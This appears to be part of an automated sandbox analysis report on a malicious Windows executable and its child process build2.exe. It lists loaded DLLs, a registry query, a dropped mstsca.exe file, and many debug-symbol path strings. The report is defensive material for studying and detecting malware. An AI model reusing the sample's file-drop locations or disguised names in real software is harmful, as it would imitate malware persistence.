Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\a2ba404d-ff63-4198-ab65-c81226d8b003\mJVVW85CnW.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\mJVVW85CnW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: mJVVW85CnW.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: nss3.pdb@ source: build2.exe, 00000008.00000002.2359987335.000000006C98F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2162286898.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159183055.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194776671.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2168819502.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209611098.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217990497.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218319196.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218932812.0000000009C6C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159491269.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2257701798.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258280957.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248186822.00000000033CD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\* source: mJVVW85CnW.exe, 00000004.00000003.2209387473.0000000009B86000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194490459.0000000009B86000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218471099.0000000009B86000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\; source: mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009B19000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178570411.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1948123921.0000000009B19000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2179148661.0000000009B1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2320564181.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312031273.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2317539740.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\( source: mJVVW85CnW.exe, 00000004.00000003.2312373705.000000000345D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\v_Q source: mJVVW85CnW.exe, 00000004.00000003.2262644144.000000000317D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2327666459.0000000009C3C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2320564181.00000000034B6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312031273.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2317539740.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Mi source: mJVVW85CnW.exe, 00000004.00000003.2328178166.0000000003563000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2311276415.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312159139.0000000003510000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2316780959.0000000003553000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312434569.0000000003513000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2325305724.0000000003553000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\AC\on Data\Temp\Symbols\ntkrnlmp.pdb\G source: mJVVW85CnW.exe, 00000004.00000003.2318784196.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000002.2336859719.0000000009C33000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2311276415.0000000003500000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312159139.0000000003510000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2312434569.0000000003513000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301768929.0000000003567000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\a source: mJVVW85CnW.exe, 00000004.00000003.2289151612.0000000009B0F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257225377.0000000009B06000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2256605004.0000000009AFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2305805567.0000000003502000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301768929.0000000003502000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2293719417.0000000003502000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: build2.exe, 00000008.00000002.2360500626.000000006F21D000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000002.2335766594.00000000033BC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbTENT_TASKBARHEADLINES.json\ta\AxS source: mJVVW85CnW.exe, 00000004.00000003.2179601467.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159183055.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159696700.0000000009BFD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\be\0 source: mJVVW85CnW.exe, 00000004.00000003.2317539740.0000000003453000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: mJVVW85CnW.exe, 00000004.00000003.2323904467.00000000033BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\S source: mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009B19000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178570411.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1948123921.0000000009B19000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2179148661.0000000009B1A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000007.00000000.1797035314.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000007.00000002.1801295260.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000000.1799119196.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ns source: mJVVW85CnW.exe, 00000004.00000003.2286586234.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2294302325.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009C67000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\wy\ source: mJVVW85CnW.exe, 00000004.00000003.2325083218.0000000003199000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.2328410477.00000000030FD000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2318938596.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2317178357.00000000034D4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ngs\y$ source: mJVVW85CnW.exe, 00000004.00000003.2259866717.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2262409948.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258660685.0000000009BE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\^0G source: mJVVW85CnW.exe, 00000004.00000003.2163571007.000000000313E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\65\ source: mJVVW85CnW.exe, 00000004.00000003.2312713278.000000000312D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ata\ source: mJVVW85CnW.exe, 00000004.00000003.2248844559.0000000009B9F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248507368.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.2296903008.0000000003480000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.000000000346F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284027851.000000000348A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\t source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ome\ge source: mJVVW85CnW.exe, 00000004.00000003.2329913318.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2331014211.00000000034FB000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2327797435.00000000034F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\FY& source: mJVVW85CnW.exe, 00000004.00000003.2162286898.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159183055.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194776671.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2168819502.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209611098.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217990497.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218319196.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218932812.0000000009C6C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159491269.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\input\lt-LT\od.pdb\we\* source: mJVVW85CnW.exe, 00000004.00000003.2327888002.0000000009BB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*\S source: mJVVW85CnW.exe, 00000004.00000003.2262080626.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257225377.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258994911.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: mJVVW85CnW.exe, 00000004.00000003.2294302325.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297057364.0000000009C4F000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2301719958.0000000009C3C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2304465664.0000000009C5C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\WinX\mp\plication Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G source: mJVVW85CnW.exe, 00000004.00000003.2259866717.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2262409948.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2258660685.0000000009BE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\SystemAppData\\Application Data\Application Data\Microsoft\Windows\WinX\mp\plication Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\G source: mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009C11000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2286586234.0000000009C30000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb764791234.txt\ source: mJVVW85CnW.exe, 00000004.00000003.2179601467.0000000003163000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\G source: mJVVW85CnW.exe, 00000004.00000003.2241371499.0000000009BCD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\1 source: mJVVW85CnW.exe, 00000004.00000003.2179231504.0000000009B04000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1870379356.0000000009AF6000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2159934346.0000000009ABC000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2195101334.0000000009B00000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178570411.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941513401.0000000009ADF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1948123921.0000000009AED000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194946115.0000000009AF3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218719984.0000000009B0D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009AEA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2178264435.0000000009AD0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\}[M source: mJVVW85CnW.exe, 00000004.00000003.2240145032.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248020922.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2194776671.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2256526995.0000000009C58000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2209611098.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2217990497.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284432496.0000000009C67000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218319196.0000000009C4B000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218932812.0000000009C6C000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2285437225.0000000009C78000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\* source: mJVVW85CnW.exe, 00000004.00000003.2258660685.0000000009BD3000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2249931581.0000000009BDA000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2257225377.0000000009B7E000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2248108132.0000000009BCF000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2262766102.0000000009BE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\ source: mJVVW85CnW.exe, 00000004.00000003.2312373705.000000000345D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009B19000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.ECApp_8wekyb3d8bbwe\RoamingState\ta\b3d8bbwe\AC\INetCookies\bbwe\AppData\pData\ad_prod.pdb\we\ source: mJVVW85CnW.exe, 00000004.00000003.2303825838.0000000009BE5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: mJVVW85CnW.exe, 00000004.00000003.2296853812.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288349564.000000000343D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.0000000003434000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\ source: mJVVW85CnW.exe, 00000004.00000003.2296903008.0000000003480000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.000000000346F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: mJVVW85CnW.exe, 00000004.00000003.1941657951.0000000009B19000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218899764.0000000009C30000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2218852977.0000000009C0E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: mJVVW85CnW.exe, 00000004.00000003.2296853812.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2284810160.0000000003434000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2297347518.000000000344D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2288349564.000000000343D000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.2295116963.0000000003434000.00000004.00000020.00020000.00000000.sdmp
